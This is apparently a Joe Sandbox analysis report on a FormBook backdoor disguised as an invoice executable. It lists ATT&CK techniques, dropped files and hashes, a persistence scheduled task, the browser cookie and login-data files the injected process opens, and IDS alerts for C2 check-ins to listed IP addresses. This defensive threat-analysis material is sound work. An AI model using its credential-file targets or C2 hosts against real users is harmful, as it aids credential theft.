            Source: Yara match File source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match File source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 212 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 51 Virtualization/Sandbox Evasion | Security Account Manager | 51 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 212 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            [Behavior graph. Behavior Graph ID: 1527933, Sample: z1SupplyInvoiceCM60916_Doc.exe, Startdate: 07/10/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            z1SupplyInvoiceCM60916_Doc.exe | 47% | ReversingLabs | Win32.Backdoor.FormBook |
            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe | 47% | ReversingLabs | Win32.Trojan.Generic |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            Name | Malicious | Antivirus Detection | Reputation
            Name | Source | Malicious | Antivirus Detection | Reputation
            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
            Joe Sandbox version: 41.0.0 Charoite
            Analysis ID: 1527933
            Start date and time: 2024-10-07 12:32:07 +02:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 11m 49s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed: 23
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 1
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: z1SupplyInvoiceCM60916_Doc.exe
            Detection: MAL
            Classification: mal100.troj.spyw.evad.winEXE@23/16@15/9
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 92%
                                                                                                                          • Number of executed functions: 175
                                                                                                                          • Number of non-executed functions: 286
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes were analyzed, report is missing behavior information
                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • VT rate limit hit for: z1SupplyInvoiceCM60916_Doc.exe
Time      Type             Description
06:32:59  API Interceptor  1x Sleep call for process: z1SupplyInvoiceCM60916_Doc.exe modified
06:33:05  API Interceptor  49x Sleep call for process: powershell.exe modified
06:33:10  API Interceptor  1x Sleep call for process: dpqsbGoWdXlp.exe modified
06:33:53  API Interceptor  14165409x Sleep call for process: svchost.exe modified
12:33:07  Task Scheduler   Run new task: dpqsbGoWdXlp path: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
                                                                                                                              Process:C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1216
                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                              Malicious:false
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                              Process:C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1216
                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                              Malicious:true
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2232
                                                                                                                              Entropy (8bit):5.380747059108785
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxvIIwLgZ2KRHWLOug8s
                                                                                                                              MD5:4D3B8C97355CF67072ABECB12613F72B
                                                                                                                              SHA1:07B27BA4FE575BBF9F893F03789AD9B8BC2F8615
                                                                                                                              SHA-256:75FC38CDE708951C1963BB89E8AA6CC82F15F1A261BEACAF1BFD9CF0518BEECD
                                                                                                                              SHA-512:8E47C93144772042865B784300F4528E079615F502A3C5DC6BFDE069880268706B7B3BEE227AD5D9EA0E6A3055EDBC90B39B9E55FE3AD58635493253A210C996
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):196608
                                                                                                                              Entropy (8bit):1.1239949490932863
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                              MD5:271D5F995996735B01672CF227C81C17
                                                                                                                              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1599
                                                                                                                              Entropy (8bit):5.099588163741439
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLUpCxv:cge7QYrFdOFzOzN33ODOiDdKrsuTopGv
                                                                                                                              MD5:3C561028589D3817F444E905EBC9D3D6
                                                                                                                              SHA1:E2A7AFD78C0778089D04B033114FECFDFCEADC9A
                                                                                                                              SHA-256:0AA78A336DECBFFB29818B596533A4F736F8FC103302C61D30E1731AB3762AD8
                                                                                                                              SHA-512:2DAFDB2B67B4EDD99FA2A8961F81DD7257D38EA8E8D9EC952F5AFF59DE2FB5B5591D029B75080814B2E94137B1DFB297BA5321678D3589136367C7A1EA35A2E6
                                                                                                                              Malicious:true
                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                                                                                                              Process:C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
                                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1599
                                                                                                                              Entropy (8bit):5.099588163741439
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLUpCxv:cge7QYrFdOFzOzN33ODOiDdKrsuTopGv
                                                                                                                              MD5:3C561028589D3817F444E905EBC9D3D6
                                                                                                                              SHA1:E2A7AFD78C0778089D04B033114FECFDFCEADC9A
                                                                                                                              SHA-256:0AA78A336DECBFFB29818B596533A4F736F8FC103302C61D30E1731AB3762AD8
                                                                                                                              SHA-512:2DAFDB2B67B4EDD99FA2A8961F81DD7257D38EA8E8D9EC952F5AFF59DE2FB5B5591D029B75080814B2E94137B1DFB297BA5321678D3589136367C7A1EA35A2E6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                                                                                                              Process:C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):949248
                                                                                                                              Entropy (8bit):7.546047142053318
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:j08rE/Yt9wmScoPQEnH1sdUg2mBHMTIOyHo4eV5mZLPQkwjTRQHNi+u:WzPdVYdBEIOyHofmZ/w/Rki
                                                                                                                              MD5:A903C6FB836F2C2C2762D1FDE269BDB8
                                                                                                                              SHA1:951DB6EEEEF69C89D7096BA54AA8C4A95273B9A4
                                                                                                                              SHA-256:BBD7BA6F8AE2B651EEB05135BA638A2DE431BE9C9A8B347621391B733C95F865
                                                                                                                              SHA-512:F7BAE9FD84F98E3434F8E8D50BB03B2D60EC2F7365F2D396277E292AAB1028936C4E7C59A9676C949150DB35273344D5E5F39FBE86A2B87BA8E5C20A392452E8
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                              Process:C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:false
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Entropy (8bit):7.546047142053318
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                              File name:z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              File size:949'248 bytes
                                                                                                                              MD5:a903c6fb836f2c2c2762d1fde269bdb8
                                                                                                                              SHA1:951db6eeeef69c89d7096ba54aa8c4a95273b9a4
                                                                                                                              SHA256:bbd7ba6f8ae2b651eeb05135ba638a2de431be9c9a8b347621391b733c95f865
                                                                                                                              SHA512:f7bae9fd84f98e3434f8e8d50bb03b2d60ec2f7365f2d396277e292aab1028936c4e7c59a9676c949150db35273344d5e5f39fbe86a2b87ba8e5c20a392452e8
                                                                                                                              SSDEEP:12288:j08rE/Yt9wmScoPQEnH1sdUg2mBHMTIOyHo4eV5mZLPQkwjTRQHNi+u:WzPdVYdBEIOyHofmZ/w/Rki
                                                                                                                              TLSH:9E15E01822A98F05E4BA47F55A64E2344BB53D9DBC2AE3490EC57CEB3D737424E42B07
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7+.g..............0..p............... ........@.. ....................................@................................
                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                              Entrypoint:0x4e8e8a
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x67032B37 [Mon Oct 7 00:28:39 2024 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                              Instruction
                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                              add byte ptr [eax], al

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe8e35 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xea000 | 0x62c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xec000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xe1ed0 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xe6e90 | 0xe7000 | 57c1d80d575a5061541cb2c0c14f4b61 | False | 0.7894007034632035 | data | 7.5545631367801445 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xea000 | 0x62c | 0x800 | 254f06fd7fa564e3bef360e1ab4c5388 | False | 0.33837890625 | data | 3.466674679946595 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xec000 | 0xc | 0x200 | 1764babad283d10a82a7bf6a1153bc26 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xea090 | 0x39c | data | | | 0.41883116883116883
RT_MANIFEST | 0xea43c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-07T12:33:30.413477+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49864 | 3.33.130.190 | 80 | TCP
2024-10-07T12:33:30.413477+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49864 | 3.33.130.190 | 80 | TCP
2024-10-07T12:33:47.257489+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49969 | 119.18.54.27 | 80 | TCP
2024-10-07T12:33:49.804750+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49987 | 119.18.54.27 | 80 | TCP
2024-10-07T12:33:52.367188+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49992 | 119.18.54.27 | 80 | TCP
2024-10-07T12:33:54.877005+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49994 | 119.18.54.27 | 80 | TCP
2024-10-07T12:33:54.877005+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49994 | 119.18.54.27 | 80 | TCP
2024-10-07T12:34:00.757031+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49995 | 104.21.5.125 | 80 | TCP
